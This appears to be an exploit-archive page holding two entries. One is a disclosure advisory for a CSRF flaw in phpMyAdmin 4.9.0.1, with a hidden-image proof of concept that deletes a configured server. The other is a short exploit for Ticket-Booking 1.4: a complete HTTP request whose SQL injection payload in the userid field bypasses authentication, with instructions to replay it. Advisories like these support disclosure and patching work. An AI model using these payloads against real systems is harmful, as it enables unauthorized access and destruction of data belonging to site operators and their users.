============================================= MGC ALERT 2019-003 - Original release date: June 13, 2019 - Last revised: September 13, 2019 - Discovered by: Manuel Garcia Cardenas - Severity: 4,3/10 (CVSS Base Score) - CVE-ID: CVE-2019-12922 ============================================= I. VULNERABILITY ------------------------- phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery II. BACKGROUND ------------------------- phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. phpMyAdmin supports a wide range of operations on MySQL and MariaDB. III. DESCRIPTION ------------------------- A Cross-Site Request Forgery vulnerability has been detected in phpMyAdmin that allows an attacker to trigger a CSRF attack against a phpMyAdmin user, deleting any server in the Setup page. IV. PROOF OF CONCEPT ------------------------- Exploit CSRF - Deleting main server <p>Deleting Server 1</p> <img src=" http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1" style="display:none;" /> V. BUSINESS IMPACT ------------------------- The attacker can easily create a fake hyperlink containing the request they want to execute on behalf of the user, in this way making a CSRF attack possible due to the wrong use of the HTTP method. VI. SYSTEMS AFFECTED ------------------------- phpMyAdmin <= 4.9.0.1 VII. SOLUTION ------------------------- Implement in each call the validation of the token variable, as already done in other phpMyAdmin requests. VIII. REFERENCES ------------------------- https://www.phpmyadmin.net/ IX. CREDITS ------------------------- This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY ------------------------- June 13, 2019 1: Initial release September 13, 2019 2: Last revision XI. 
DISCLOSURE TIMELINE ------------------------- June 13, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas June 13, 2019 2: Send to vendor July 16, 2019 3: New request to vendor without fix date September 13, 2019 4: Sent to lists XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT ------------------------- Manuel Garcia Cardenas Pentester
-
Ticket-Booking 1.4 - Authentication Bypass
# Exploit Title: Ticket-Booking 1.4 - Authentication Bypass # Author: Cakes # Discovery Date: 2019-09-14 # Vendor Homepage: https://github.com/ABHIJEET-MUNESHWAR/Ticket-Booking # Software Link: https://github.com/ABHIJEET-MUNESHWAR/Ticket-Booking/archive/master.zip # Tested Version: 1.4 # Tested on OS: CentOS 7 # CVE: N/A # Description: # Easy authentication bypass vulnerability on this ticket booking application # allowing the attacker to remove any previously booked seats # Simply replay the below Burp request or use Curl (remember to change the Cookie Values) POST /ticket/cancel.php HTTP/1.1 Host: Target User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://Target/ticket/login.php Content-Type: application/x-www-form-urlencoded Content-Length: 50 Cookie: PHPSESSID=j9jrgserbga22a9q9u165uirh4; rental_property_manager=mq5iitk8ic80ffa8dcf28294d4 Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 userid='%20or%200%3d0%20#&password=123&save=signin